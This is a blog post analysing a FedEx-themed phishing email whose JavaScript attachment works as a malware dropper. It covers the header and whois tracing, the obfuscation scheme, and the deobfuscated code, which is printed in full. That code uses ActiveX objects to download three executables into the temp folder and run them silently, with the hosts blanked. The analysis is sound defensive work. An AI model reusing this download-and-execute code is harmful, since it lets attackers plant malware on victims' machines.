Wednesday, 10 December 2014

FedEx sent me free parcel... should I sign for karate lessons ?

Yesterday I received a nice looking FedEx email with information about shipment deliver problem. I am not waiting for any shipment and I am always cautious about emails with packaged attachments, so I have started my analysis.

The email looks nearly perfect - it contains FedEx logo, agent name and proper english grammar. The only thing which is suspicious is the source address of the sender:

However, simple SMTP headers analysis disclosed "real" address of the sender, altogether with software used during this phishing campaign:

Right. It seems that the email was sent from IP address (potentially proxy or VPN server) which belongs to HostEurope GmbH:

inetnum: -
remarks:        INFRA-AW
netname:        DE-HE-LVPS-CGN3-NET
descr:          Host Europe GmbH
country:        DE
admin-c:        HER
tech-c:         HER
status:         ASSIGNED PA
mnt-by:         HOSTEUROPE-MNT
source:         RIPE # Filtered

role:           Host Europe Ripehandle
address:        Welserstrasse 14
address:        51149 Koeln
phone:          +49 2203 1045 0
admin-c:        BURN
admin-c:        HONK
admin-c:        JUPP
admin-c:        MATE
admin-c:        METT
admin-c:        MOMO
admin-c:        OUZO
admin-c:        SEPP
admin-c:        WIRR
tech-c:         BURN
tech-c:         HONK
tech-c:         JUPP
tech-c:         MATE
tech-c:         METT
tech-c:         MOMO
tech-c:         OUZO
tech-c:         SEPP
tech-c:         WIRR
nic-hdl:        HER
mnt-by:         HOSTEUROPE-MNT
source:         RIPE # Filtered

% Information related to ''

descr:          DE-HER-178-77-64-SLASH-18
origin:         AS20773
member-of:      AS20773:RS-HOSTEUROPE
mnt-by:         HOSTEUROPE-MNT
source:         RIPE # Filtered

Ok, let's dig into the suspicious attachment itself. The first thing which I noticed is that the archive contains just single JavaScript file:
The payload itself contains lightly obfuscated JavaScript code. The obfuscation algorithm uses functions chain in order to concatenate supplied arguments into the resulting code. This method is simple, yet effective:
define function _N(x) { call _N+1(x + truncated_string1); }
define function _N+1(x) { call _N+2(x + truncated_string2); }
define function _N+2(x) { call _N+3(x + truncated_string3); }
define function _N+166(x) { call _N+167(x + truncated_string166); }
define function _N+167(x) { eval(x); }
To deobfuscate this code I used online javascript deobfuscator/unpacker available at The final code looks like this:
function dl(fr,fn,rn) { var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+fn; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function() { if (xo.readyState === 4) { var xa = new ActiveXObject("ADODB.Stream");; xa.type = 1; xa.write(xo.ResponseBody); xa.position = 0; xa.saveToFile(fn,2); xa.close(); }; }; try {"GET",fr,false); xo.send(); if (rn > 0) { ws.Run(fn,0,0); }; } catch (er) { }; }; dl("","52240608.exe",1); dl("","37844845.exe",1); dl("","12214282.exe",1);
//info.ActiveXObject WScript.Shell
Now it is much easier to understand what this code does: when the file is downloaded and unpacked it automatically belongs to the Local (My Computer) Zone. In this zone ActiveXObject can be run without any notification to the user (more info here). When a victim executes the file the code downloads and executes a malicious PE executables from host. Let's see who is the owner of this domain and if it was registered currently (indicator that it may be used especially for attacks) or some time ago (potentially pwned).
In order to continue with the analysis I used RobTex - A Swiss Army Knife for Internet Tool (full analysis here). From the analysis:
Zuari Agro Chemicals Ltd. Overview. Zuari is a single-window agricultural solution provider.
The domain was registered on 16-Feb-2005, authoritative nameservers and all the rest are outsourced to external provider (NS, MX, sharedhosting, etc.). My initial assumption that this host was simply pwned seems to be right.

But hey, what about the executables ? I think it is a good time to take a closer look on them! In order to download them from I used curl through VPN connection (simply I don't like to stay in the logs). It is worth to note that only certain UAs have ability to download our malicious executables, since the attacker validates User-Agent strings:

  • curl with default UA string:
  • curl with standard Internet Explorer UA string:

Armored with this knowledge I downloaded all the samples pointed in the original JavaScript file:

Next, I checked scoring of these files on

So, even if these files are no more FUD, they still have relatively low detection rate. Perhaps these files have been used in some current phishing campaign but have not been updated recently. To get more information without actually analysing these files locally (I know that sometimes I am too lazy) I used service which provides web interface to Cuckoo Sandbox.

Ok, we are at the end of part 1 (apologize, but posting blog entries is not my main activity). In part 2 I am going to dissect malware using static and dynamic approach (fans of windbg, Immunity Debugger and IDA Pro are welcome!).

See you soon!